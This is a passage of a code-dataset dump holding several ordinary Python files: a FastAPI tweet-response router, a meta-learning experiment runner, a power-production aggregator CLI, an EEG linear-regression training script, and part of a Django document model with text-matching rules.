str(tweet[\"date\"])\n \n if incorrect_tweets[company_id].get(resp[\"tweet_id\"], False):\n tweet = dict(incorrect_tweets[company_id].get(resp[\"tweet_id\"], False))\n tweet[\"date\"] = str(tweet[\"date\"])\n\n responses_db.append({\n \"twitter_handle\": resp[\"twitterHandle\"],\n \"company_id\": resp[\"company_id\"],\n \"tweet\": tweet,\n \"action\": resp[\"action\"],\n })\n save_responses(responses_db)\n\n return 204\n except KeyError:\n raise HTTPException(status_code=500, detail=\"Something went wrong\")\n \n", "repo_name": "GUH-2022-LWSN/GUH-IDEA", "sub_path": "app/routers/responses.py", "file_name": "responses.py", "file_ext": "py", "file_size_in_byte": 1616, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "fastapi.APIRouter", "line_number": 7, "usage_type": "call"}, {"api_name": "internal.responses.RecordResponse", "line_number": 12, "usage_type": "name"}, {"api_name": "database.responses.load_respones", "line_number": 15, "usage_type": "call"}, {"api_name": "round_robin.correct_tweets", "line_number": 22, "usage_type": "name"}, {"api_name": "round_robin.incorrect_tweets", "line_number": 22, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 23, "usage_type": "call"}, {"api_name": "round_robin.correct_tweets", "line_number": 25, "usage_type": "name"}, {"api_name": "round_robin.correct_tweets", "line_number": 26, "usage_type": "name"}, {"api_name": "round_robin.incorrect_tweets", "line_number": 29, "usage_type": "name"}, {"api_name": "round_robin.incorrect_tweets", "line_number": 30, "usage_type": "name"}, {"api_name": "database.responses.save_responses", "line_number": 39, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "39654822910", "text": "\"\"\"Run experiments\n\nMain experimental pipeline, including:\n- download base datasets\n- calculate meta-datasets\n- train and evaluate meta-models\n- determine meta-feature importance\n- aggregate evaluation metrics, create tables and some plots\n\nUsage: python -m metalfi.src.run_experiments --help\n\"\"\"\nimport argparse\nimport os\n\nfrom metalfi.src.controller import Controller\nimport metalfi.src.memory as memory\nfrom metalfi.src.parameters import Parameters\n\n\n# \"delete_inputs\": Whether to 
delete base datasets and meta-datasets.\n# \"delete_outputs\": Whether to delete meta-models and results.\ndef run_experiments(delete_inputs: bool = False, delete_outputs: bool = False):\n if delete_inputs:\n memory.clear_directories([Parameters.base_dataset_dir, Parameters.meta_dataset_dir,\n Parameters.output_dir + \"meta_computation_time\"])\n if delete_outputs:\n directories = [\"meta_feature_importance\", \"meta_prediction_performance\", \"feature_selection_performance\"]\n directories = [Parameters.output_dir + x for x in directories]\n directories.append(Parameters.meta_model_dir)\n memory.clear_directories(directories)\n\n c = Controller() # downloads base datasets, creates meta-datasets\n c.train_meta_models()\n c.meta_feature_importances()\n c.estimate([x for x in os.listdir(Parameters.meta_model_dir) if x != \".gitignore\"])\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Runs the experimental pipeline.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--delete_inputs', action='store_true',\n help='Delete all base datasets and meta-datasets from previous runs first.')\n parser.add_argument('--delete_outputs', action='store_true',\n help='Delete all meta-models and results from previous runs first.')\n print('Experimental pipeline started.')\n run_experiments(**vars(parser.parse_args()))\n print('Experimental pipeline executed successfully.')\n", "repo_name": "CemOezcan/metalfi", "sub_path": "metalfi/src/run_experiments.py", "file_name": "run_experiments.py", "file_ext": "py", "file_size_in_byte": 2080, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "metalfi.src.memory.clear_directories", "line_number": 24, "usage_type": "call"}, {"api_name": "metalfi.src.memory", "line_number": 24, "usage_type": "name"}, {"api_name": "metalfi.src.parameters.Parameters.base_dataset_dir", "line_number": 24, "usage_type": "attribute"}, {"api_name": "metalfi.src.parameters.Parameters", "line_number": 24, "usage_type": "name"}, {"api_name": "metalfi.src.parameters.Parameters.meta_dataset_dir", "line_number": 24, "usage_type": "attribute"}, {"api_name": "metalfi.src.parameters.Parameters.output_dir", "line_number": 25, "usage_type": "attribute"}, {"api_name": "metalfi.src.parameters.Parameters", "line_number": 25, "usage_type": "name"}, {"api_name": "metalfi.src.parameters.Parameters.output_dir", "line_number": 28, "usage_type": "attribute"}, {"api_name": "metalfi.src.parameters.Parameters", "line_number": 28, "usage_type": "name"}, {"api_name": "metalfi.src.parameters.Parameters.meta_model_dir", "line_number": 29, "usage_type": "attribute"}, {"api_name": "metalfi.src.parameters.Parameters", "line_number": 29, "usage_type": "name"}, {"api_name": "metalfi.src.memory.clear_directories", "line_number": 30, "usage_type": "call"}, {"api_name": "metalfi.src.memory", "line_number": 30, "usage_type": "name"}, {"api_name": "metalfi.src.controller.Controller", "line_number": 32, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 35, "usage_type": "call"}, {"api_name": "metalfi.src.parameters.Parameters.meta_model_dir", "line_number": 35, "usage_type": "attribute"}, {"api_name": "metalfi.src.parameters.Parameters", "line_number": 35, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 39, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 40, "usage_type": "attribute"}]}
+{"seq_id": "847540605", "text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom argparse import ArgumentParser\nfrom yaml import safe_load\n\nfrom docl.power_aggregator.retriever import get_productions\n\nfrom docl.power_aggregator.cleaner import clean_raw_productions\n\nfrom docl.power_aggregator.exporter import export\n\nfrom docl.power_aggregator.aggregator import synchronize_productions, check_synchronized_productions, aggregate_productions\n\nfrom docl.power_aggregator.utils.check import check_params, check_config\n\nCONFIG_PATH = \"config.yml\"\n\ndef main():\n\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n logger = logging.getLogger(\"docl.power_aggregator\")\n\n logger.info(\"Start\")\n\n parser = ArgumentParser(description=\"Process end to end test on DWIB\")\n parser.add_argument('--from', required=True, help='beggining of period DD-MM-YYYY')\n parser.add_argument('--to', required=True, help='end of period DD-MM-YYYY')\n parser.add_argument('--format', required=True, help='output format, json or csv')\n\n args = vars(parser.parse_args())\n \n config = None\n with open(CONFIG_PATH, \"r\") as f:\n config = safe_load(f)\n \n check_params(args)\n check_config(config)\n\n start_date = args['from']\n end_date = args['to']\n output_format = args['format']\n\n # Retrieve productions from API\n raw_productions = get_productions(config['url'], config['power_plants'], start_date, end_date)\n \n # Fill missing data in productions\n productions = clean_raw_productions(raw_productions)\n \n # Synchronize production to 900s dt\n synchronized_productions = synchronize_productions(productions)\n\n # Check that synchronized productions can be aggregated (start timestamps must match)\n check_synchronized_productions(synchronized_productions)\n\n # Check that synchronized productions can be aggregated (start timestamps must match)\n aggregated_productions = aggregate_productions(synchronized_productions)\n\n export(aggregated_productions, output_format)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "walari/power_aggregator", "sub_path": "docl.power_aggregator/docl/power_aggregator/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2075, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.basicConfig", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 21, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 22, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 26, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 35, "usage_type": "call"}, {"api_name": "docl.power_aggregator.utils.check.check_params", "line_number": 37, "usage_type": "call"}, {"api_name": "docl.power_aggregator.utils.check.check_config", "line_number": 38, "usage_type": "call"}, {"api_name": "docl.power_aggregator.retriever.get_productions", "line_number": 45, "usage_type": "call"}, {"api_name": "docl.power_aggregator.cleaner.clean_raw_productions", "line_number": 48, "usage_type": "call"}, {"api_name": "docl.power_aggregator.aggregator.synchronize_productions", "line_number": 51, "usage_type": "call"}, {"api_name": "docl.power_aggregator.aggregator.check_synchronized_productions", "line_number": 54, "usage_type": "call"}, {"api_name": "docl.power_aggregator.aggregator.aggregate_productions", "line_number": 57, "usage_type": "call"}, {"api_name": 
"docl.power_aggregator.exporter.export", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "34861242909", "text": "import sys\nsys.path.append('..')\nfrom src import ML\nfrom src import config\nfrom src.Standard import SpectralAverage\nimport os\nfrom tqdm import tqdm\nimport argparse\nfrom datetime import datetime\n\n\ndef main():\n\n parser = argparse.ArgumentParser(\n description=\"Options for Linear Regression \"\n + \"method of ML.Classifier\")\n\n parser.add_argument('data_type',\n type=str,\n help=\"Input data type: contigs, erps, or spectra\")\n\n parser.add_argument('--studies_folder',\n dest='studies_folder',\n type=str,\n default=config.my_studies,\n help=\"(Default: \" + config.my_studies + \") Path to \"\n + \"parent folder containing study folders\")\n\n parser.add_argument('--study_names',\n dest='study_names',\n nargs='+',\n default=config.study_directory,\n help=\"(Default: \" + config.study_directory + \") \"\n + \"Study folder containing dataset\")\n\n parser.add_argument('--balance',\n dest='balance',\n type=bool,\n default=False,\n help=\"(Default: False) If True, then will pop data \"\n + \"from the larger class datasets until balanced.\")\n\n parser.add_argument('--task',\n dest='task',\n type=str,\n default='P300',\n help=\"(Default: P300) Four-character task name. \"\n + \"Options: \" + str([key for key in config.tasks]))\n\n parser.add_argument('--length',\n dest='length',\n type=int,\n default=250,\n help=\"(Default: 250) Duration of input data, in \"\n + \"number of samples @ \"\n + str(config.sample_rate) + \" Hz\")\n\n parser.add_argument('--channels',\n dest='channels',\n type=str,\n default='1111111111111111111',\n help=\"(Default: 1111111111111111111) Binary string \"\n + \"specifying which of the \"\n + \"following EEG channels will be included \"\n + \"in analysis: \" + str(config.channel_names))\n\n parser.add_argument('--artifact',\n dest='artifact',\n type=str,\n default=''.join(map(str, config.custom_art_map)),\n help=\"(Default: (custom) \"\n + ''.join(map(str, config.custom_art_map))\n + \") Strictness of artifacting \"\n + \"algorithm to be used: 0=strict, 1=some, 2=raw\")\n\n parser.add_argument('--erp_degree',\n dest='erp_degree',\n type=int,\n default=None,\n help=\"(Default: None) If not None, lowest number in \"\n + \".evt files which will be accepted as an erp event. \"\n + \"Only contigs falling immediately after erp event, \"\n + \"i.e. evoked responses, are handled.\")\n\n parser.add_argument('--filter_band',\n dest='filter_band',\n type=str,\n default='nofilter',\n help=\"(Default: nofilter) Bandfilter to be used in \"\n + \"analysis steps, such \"\n + \"as: 'noalpha', 'delta', or 'nofilter'\")\n\n # ============== CNN args ==============\n\n parser.add_argument('--normalize',\n dest='normalize',\n type=str,\n default=None,\n help=\"(Default: None) Which normalization technique \"\n + \"to use. 
One of \"\n + \"the following: standard, minmax, None\")\n\n parser.add_argument('--sample_weight',\n dest='sample_weight',\n type=bool,\n default=False,\n help=\"(Default: None) If 'auto', uses auto sample \"\n + \"weighting to try to resolve class imbalances\")\n\n parser.add_argument('--plot_data',\n dest='plot_data',\n type=bool,\n default=False,\n help=\"(Default: False) If True, plots coefficients \"\n + \"of linear regression model.\")\n\n parser.add_argument('--plot_ROC',\n dest='plot_ROC',\n type=bool,\n default=False,\n help=\"(Default: False) Plot sensitivity-specificity \"\n + \"curve on validation dataset\")\n\n parser.add_argument('--plot_conf',\n dest='plot_conf',\n type=bool,\n default=False,\n help=\"(Default: False) Plot confusion matrix \"\n + \"on validation dataset\")\n\n parser.add_argument('--plot_spectra',\n dest='plot_spectra',\n type=bool,\n default=False,\n help=\"(Default: False) Plot spectra by group for \"\n + \"training data\")\n\n parser.add_argument('--tt_split',\n dest='tt_split',\n type=float,\n default=0.33,\n help=\"(Default: 0.33) Ratio of test samples \"\n + \"to train samples. Note: not applicable if using \"\n + \"k_folds.\")\n\n parser.add_argument('--k_folds',\n dest='k_folds',\n type=int,\n default=1,\n help=\"(Default: 1) If you want to perform \"\n + \"cross evaluation, set equal to number of k-folds.\")\n\n parser.add_argument('--repetitions',\n dest='repetitions',\n type=int,\n default=1,\n help=\"(Default: 1) Unlike k-fold, trains the \"\n + \"model n times without mixing around subjects. \"\n + \"Can still be used within each k-fold.\")\n\n parser.add_argument('--regularizer',\n dest='regularizer',\n type=str,\n default=None,\n help=\"(Default: l1_l2) Regularizer to be used in dense \"\n + \"layers. One of: ['l1', 'l2', 'l1_l2']\")\n\n parser.add_argument('--regularizer_param',\n dest='regularizer_param',\n type=float,\n default=0.01,\n help=\"(Default: 0.01) Regularization parameter \")\n\n # save the variables in 'args'\n args = parser.parse_args()\n\n data_type = args.data_type\n studies_folder = args.studies_folder\n study_names = args.study_names\n task = args.task\n length = args.length\n channels = args.channels\n artifact = args.artifact\n erp_degree = args.erp_degree\n filter_band = args.filter_band\n normalize = args.normalize\n sample_weight = args.sample_weight\n plot_data = args.plot_data\n plot_ROC = args.plot_ROC\n plot_conf = args.plot_conf\n plot_spectra = args.plot_spectra\n tt_split = args.tt_split\n k_folds = args.k_folds\n repetitions = args.repetitions\n regularizer = args.regularizer\n regularizer_param = args.regularizer_param\n balance = args.balance\n\n # ERROR HANDLING\n if data_type not in [\"erps\", \"spectra\", \"contigs\"]:\n print(\n \"Invalid entry for data_type. 
\"\n + \"Must be one of ['erps', 'contigs', 'spectra']\")\n raise ValueError\n sys.exit(3)\n\n if not os.path.isdir(studies_folder):\n print(\n \"Invalid entry for studies_folder, \"\n + \"path does not exist as directory.\")\n raise FileNotFoundError\n sys.exit(3)\n\n for study_name in study_names:\n if not os.path.isdir(os.path.join(studies_folder, study_name)):\n print(\n \"Invalid entry for study_name, \"\n + \"path does not exist as directory.\")\n raise FileNotFoundError\n sys.exit(3)\n\n if task not in config.tasks:\n print(\n \"Invalid entry for task, \"\n + \"not accepted as regular task name in config.\")\n raise ValueError\n sys.exit(3)\n\n if type(length) is int is False:\n print(\"Length must be an integer (in Hz).\")\n raise ValueError\n sys.exit(3)\n\n try:\n if (length <= 0) or (length > 10000):\n print(\"Invalid entry for length, must be between 0 and 10000.\")\n raise ValueError\n sys.exit(3)\n except TypeError:\n print(\n \"Invalid entry for length, \"\n + \"must be integer value between 0 and 10000.\")\n raise ValueError\n sys.exit(3)\n\n try:\n str(channels)\n except ValueError:\n print(\n \"Invalid entry for channels. Must be 19-char long string of \"\n + \"1s and 0s\")\n raise ValueError\n sys.exit(3)\n\n if len(channels) != 19:\n print(\n \"Invalid entry for channels. Must be 19-char long string of \"\n + \"1s and 0s\")\n raise ValueError\n sys.exit(3)\n\n for char in channels:\n if char != '0' and char != '1':\n print(\n \"Invalid entry for channels. Must be 19-char long string of \"\n + \"1s and 0s\")\n raise ValueError\n sys.exit(3)\n\n if normalize not in [\"standard\", \"minmax\", None]:\n print(\n \"Invalid entry for normalize. \"\n + \"Must be one of ['standard', 'minmax', 'None'].\")\n raise ValueError\n sys.exit(3)\n\n if tt_split < 0 or tt_split > 0.999:\n print(\n \"Invalid entry for tt_split. Must be float between \"\n + \"0 and 0.999.\")\n raise ValueError\n sys.exit(3)\n\n try:\n if len(str(artifact)) == 19:\n for char in artifact:\n if int(char) < 0 or int(char) > 2:\n raise ValueError\n\n elif artifact in [\"0\", \"1\", \"2\"]:\n artifact = int(artifact)\n\n else:\n raise ValueError\n\n except ValueError:\n print(\n \"Invalid entry for artifact. Must be str with length 19, \"\n + \"or int between 0 and 2.\")\n raise ValueError\n sys.exit(3)\n\n if erp_degree not in [1, 2, None]:\n print(\"Invalid entry for erp_degree. Must be None, 1, or 2.\")\n raise ValueError\n sys.exit(3)\n\n if k_folds <= 0:\n print(\"Invalid entry for k_folds. Must be int 1 or greater.\")\n raise ValueError\n sys.exit(3)\n\n if regularizer is not None:\n if regularizer not in ['l1', 'l2', 'l1_l2']:\n print(\"Invalid entry for regularizer. Must be l1, l2, or l1_l2.\")\n raise ValueError\n sys.exit(3)\n\n if (regularizer_param <= 0) or (regularizer_param >= 1):\n print(\n \"Invalid entry for regularizer param. Must be float between \"\n + \"0 and 1.\")\n raise ValueError\n sys.exit(3)\n\n if filter_band == \"nofilter\":\n pass\n elif any(band == filter_band for band in config.frequency_bands):\n pass\n elif any(\"no\"+band == filter_band for band in config.frequency_bands):\n pass\n elif any(\"lo\"+band == filter_band for band in config.frequency_bands):\n pass\n elif any(\"hi\"+band == filter_band for band in config.frequency_bands):\n pass\n else:\n print(\"That is not a valid filterband option.\")\n raise ValueError\n sys.exit(3)\n\n patient_paths = []\n # patient_path points to our 'condition-positive' dataset\n # ex. 
patient_path =\n # \"/wavi/EEGstudies/CANlab/spectra/P300_250_1111111111111111111_0_1\"\n for study_name in study_names:\n\n patient_path = studies_folder\\\n + '/'\\\n + study_name\\\n + '/'\\\n + data_type\\\n + '/'\\\n + task\\\n + '_'\\\n + str(length)\\\n + '_'\\\n + channels\\\n + '_'\\\n + str(artifact)\n\n if erp_degree is not None:\n patient_path += (\"_\" + str(erp_degree))\n\n if not os.path.isdir(patient_path):\n print(\"Configuration supplied was not found in study folder data.\")\n print(\"Failed:\", patient_path)\n raise FileNotFoundError\n sys.exit(3)\n\n patient_paths.append(patient_path)\n\n # Instantiate a 'Classifier' Object\n myclf = ML.Classifier(data_type)\n\n # ============== Load All Studies' Data ==============\n patient_paths = []\n # patient_path points to our 'condition-positive' dataset\n # ex. patient_path =\n # \"/wavi/EEGstudies/CANlab/spectra/P300_250_1111111111111111111_0_1\"\n for study_name in study_names:\n\n patient_path = studies_folder\\\n + '/'\\\n + study_name\\\n + '/'\\\n + data_type\\\n + '/'\\\n + task\\\n + '_'\\\n + str(length)\\\n + '_'\\\n + channels\\\n + '_'\\\n + str(artifact)\n\n if erp_degree is not None:\n patient_path += (\"_\" + str(erp_degree))\n\n if not os.path.isdir(patient_path):\n print(\"Configuration supplied was not found in study folder data.\")\n print(\"Failed:\", patient_path)\n raise FileNotFoundError\n sys.exit(3)\n\n patient_paths.append(patient_path)\n\n for patient_path in patient_paths:\n for fname in sorted(os.listdir(patient_path)):\n if \"_\"+filter_band in fname:\n myclf.LoadData(patient_path+\"/\"+fname)\n\n # ============== Balance Class Data Sizes ==============\n # pops data off from the larger class until class sizes are equal\n # found in the reference folders\n if balance is True:\n myclf.Balance()\n\n if k_folds == 1:\n myclf.Prepare(tt_split=tt_split, normalize=normalize)\n\n for i in range(repetitions):\n\n model, y_pred, y_labels = myclf.LinearRegression(\n plot_data=plot_data,\n plot_ROC=plot_ROC,\n plot_conf=plot_conf)\n\n if data_type == 'spectra':\n if plot_spectra is True:\n specavgObj = SpectralAverage(myclf)\n specavgObj.plot(\n fig_fname=myclf.checkpoint_dir\n + \"/specavg_\"\n + os.path.basename(myclf.trial_name)\n + \"_train_\"\n + str(datetime.now().strftime(\"%H-%M-%S\")))\n\n if k_folds > 1:\n myclf.KfoldCrossVal(\n myclf.LDA,\n normalize=normalize,\n regularizer=regularizer,\n regularizer_param=regularizer_param,\n repetitions=repetitions,\n learning_rate=learning_rate,\n lr_decay=lr_decay,\n plot_ROC=plot_ROC,\n plot_conf=plot_conf,\n plot_3d_preds=plot_3d_preds,\n k=k_folds,\n plot_spec_avgs=plot_spectra,\n sample_weight=sample_weight)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "canlab/WAViMedEEG", "sub_path": "scripts/Run_linearregression.py", "file_name": "Run_linearregression.py", "file_ext": "py", "file_size_in_byte": 15711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "86", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "src.config.my_studies", "line_number": 25, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 25, "usage_type": "name"}, {"api_name": "src.config.my_studies", "line_number": 26, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 26, "usage_type": "name"}, 
{"api_name": "src.config.study_directory", "line_number": 32, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 32, "usage_type": "name"}, {"api_name": "src.config.study_directory", "line_number": 33, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 33, "usage_type": "name"}, {"api_name": "src.config.tasks", "line_number": 48, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 48, "usage_type": "name"}, {"api_name": "src.config.sample_rate", "line_number": 56, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 56, "usage_type": "name"}, {"api_name": "src.config.channel_names", "line_number": 65, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 65, "usage_type": "name"}, {"api_name": "src.config.custom_art_map", "line_number": 70, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 70, "usage_type": "name"}, {"api_name": "src.config.custom_art_map", "line_number": 72, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 72, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path", "line_number": 207, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 212, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 215, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 220, "usage_type": "call"}, {"api_name": "src.config.tasks", "line_number": 222, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 222, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 227, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 232, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 238, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 244, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 253, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 260, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 268, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 275, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 282, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 301, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 306, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 311, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 317, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 324, "usage_type": "call"}, {"api_name": "src.config.frequency_bands", "line_number": 328, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 328, "usage_type": "name"}, {"api_name": "src.config.frequency_bands", "line_number": 330, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 330, "usage_type": "name"}, {"api_name": "src.config.frequency_bands", "line_number": 332, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 332, "usage_type": "name"}, {"api_name": "src.config.frequency_bands", "line_number": 334, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 334, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 364, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 364, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 368, "usage_type": "call"}, {"api_name": "src.ML.Classifier", "line_number": 373, "usage_type": "call"}, {"api_name": "src.ML", "line_number": 373, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 399, "usage_type": "call"}, {"api_name": "os.path", "line_number": 399, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 403, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 408, "usage_type": "call"}, {"api_name": "src.Standard.SpectralAverage", "line_number": 430, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 434, "usage_type": "call"}, {"api_name": "os.path", "line_number": 434, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 436, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 436, "usage_type": "name"}]} +{"seq_id": "35906864682", "text": "# coding=utf-8\n\nimport logging\nimport os\nimport re\nimport uuid\nfrom collections import OrderedDict\n\nimport dateutil.parser\nfrom django.conf import settings\nfrom django.db import models\nfrom django.template.defaultfilters import slugify\nfrom django.utils import timezone\nfrom django.utils.text import slugify\nfrom fuzzywuzzy import fuzz\n\nfrom .managers import LogManager\n\ntry:\n from django.core.urlresolvers import reverse\nexcept ImportError:\n from django.urls import reverse\n\n\nclass MatchingModel(models.Model):\n\n MATCH_ANY = 1\n MATCH_ALL = 2\n MATCH_LITERAL = 3\n MATCH_REGEX = 4\n MATCH_FUZZY = 5\n MATCHING_ALGORITHMS = (\n (MATCH_ANY, \"Any\"),\n (MATCH_ALL, \"All\"),\n (MATCH_LITERAL, \"Literal\"),\n (MATCH_REGEX, \"Regular Expression\"),\n (MATCH_FUZZY, \"Fuzzy Match\"),\n )\n\n name = models.CharField(max_length=128, unique=True)\n slug = models.SlugField(blank=True, editable=False)\n\n match = models.CharField(max_length=256, blank=True)\n matching_algorithm = models.PositiveIntegerField(\n choices=MATCHING_ALGORITHMS,\n default=MATCH_ANY,\n help_text=(\n \"Which algorithm you want to use when matching text to the OCR'd \"\n \"PDF. Here, \\\"any\\\" looks for any occurrence of any word \"\n \"provided in the PDF, while \\\"all\\\" requires that every word \"\n \"provided appear in the PDF, albeit not in the order provided. A \"\n \"\\\"literal\\\" match means that the text you enter must appear in \"\n \"the PDF exactly as you've entered it, and \\\"regular expression\\\" \"\n \"uses a regex to match the PDF. (If you don't know what a regex \"\n \"is, you probably don't want this option.) 
Finally, a \\\"fuzzy \"\n \"match\\\" looks for words or phrases that are mostly—but not \"\n \"exactly—the same, which can be useful for matching against \"\n \"documents containg imperfections that foil accurate OCR.\"\n )\n )\n\n is_insensitive = models.BooleanField(default=True)\n\n class Meta:\n abstract = True\n ordering = (\"name\",)\n\n def __str__(self):\n return self.name\n\n @property\n def conditions(self):\n return \"{}: \\\"{}\\\" ({})\".format(\n self.name, self.match, self.get_matching_algorithm_display())\n\n @classmethod\n def match_all(cls, text, tags=None):\n\n if tags is None:\n tags = cls.objects.all()\n\n text = text.lower()\n for tag in tags:\n if tag.matches(text):\n yield tag\n\n def matches(self, text):\n\n search_kwargs = {}\n\n # Check that match is not empty\n if self.match.strip() == \"\":\n return False\n\n if self.is_insensitive:\n search_kwargs = {\"flags\": re.IGNORECASE}\n\n if self.matching_algorithm == self.MATCH_ALL:\n for word in self._split_match():\n search_result = re.search(\n r\"\\b{}\\b\".format(word), text, **search_kwargs)\n if not search_result:\n return False\n return True\n\n if self.matching_algorithm == self.MATCH_ANY:\n for word in self._split_match():\n if re.search(r\"\\b{}\\b\".format(word), text, **search_kwargs):\n return True\n return False\n\n if self.matching_algorithm == self.MATCH_LITERAL:\n return bool(re.search(\n r\"\\b{}\\b\".format(self.match), text, **search_kwargs))\n\n if self.matching_algorithm == self.MATCH_REGEX:\n return bool(re.search(\n re.compile(self.match, **search_kwargs), text))\n\n if self.matching_algorithm == self.MATCH_FUZZY:\n match = re.sub(r'[^\\w\\s]', '', self.match)\n text = re.sub(r'[^\\w\\s]', '', text)\n if self.is_insensitive:\n match = match.lower()\n text = text.lower()\n\n return True if fuzz.partial_ratio(match, text) >= 90 else False\n\n raise NotImplementedError(\"Unsupported matching algorithm\")\n\n def _split_match(self):\n \"\"\"\n Splits the match to individual keywords, getting rid of unnecessary\n spaces and grouping quoted words together.\n\n Example:\n ' some random words \"with quotes \" and spaces'\n ==>\n [\"some\", \"random\", \"words\", \"with+quotes\", \"and\", \"spaces\"]\n \"\"\"\n findterms = re.compile(r'\"([^\"]+)\"|(\\S+)').findall\n normspace = re.compile(r\"\\s+\").sub\n return [\n normspace(\" \", (t[0] or t[1]).strip()).replace(\" \", r\"\\s+\")\n for t in findterms(self.match)\n ]\n\n def save(self, *args, **kwargs):\n\n self.match = self.match.lower()\n self.slug = slugify(self.name)\n\n models.Model.save(self, *args, **kwargs)\n\n\nclass Correspondent(MatchingModel):\n\n # This regex is probably more restrictive than it needs to be, but it's\n # better safe than sorry.\n SAFE_REGEX = re.compile(r\"^[\\w\\- ,.']+$\")\n\n class Meta:\n ordering = (\"name\",)\n\n\nclass Tag(MatchingModel):\n\n COLOURS = (\n (1, \"#a6cee3\"),\n (2, \"#1f78b4\"),\n (3, \"#b2df8a\"),\n (4, \"#33a02c\"),\n (5, \"#fb9a99\"),\n (6, \"#e31a1c\"),\n (7, \"#fdbf6f\"),\n (8, \"#ff7f00\"),\n (9, \"#cab2d6\"),\n (10, \"#6a3d9a\"),\n (11, \"#b15928\"),\n (12, \"#000000\"),\n (13, \"#cccccc\")\n )\n\n colour = models.PositiveIntegerField(choices=COLOURS, default=1)\n\n\nclass Document(models.Model):\n\n TYPE_PDF = \"pdf\"\n TYPE_PNG = \"png\"\n TYPE_JPG = \"jpg\"\n TYPE_GIF = \"gif\"\n TYPE_TIF = \"tiff\"\n TYPE_TXT = \"txt\"\n TYPE_CSV = \"csv\"\n TYPE_MD = \"md\"\n TYPES = (TYPE_PDF, TYPE_PNG, TYPE_JPG, TYPE_GIF, TYPE_TIF,\n TYPE_TXT, TYPE_CSV, TYPE_MD)\n\n STORAGE_TYPE_UNENCRYPTED = 
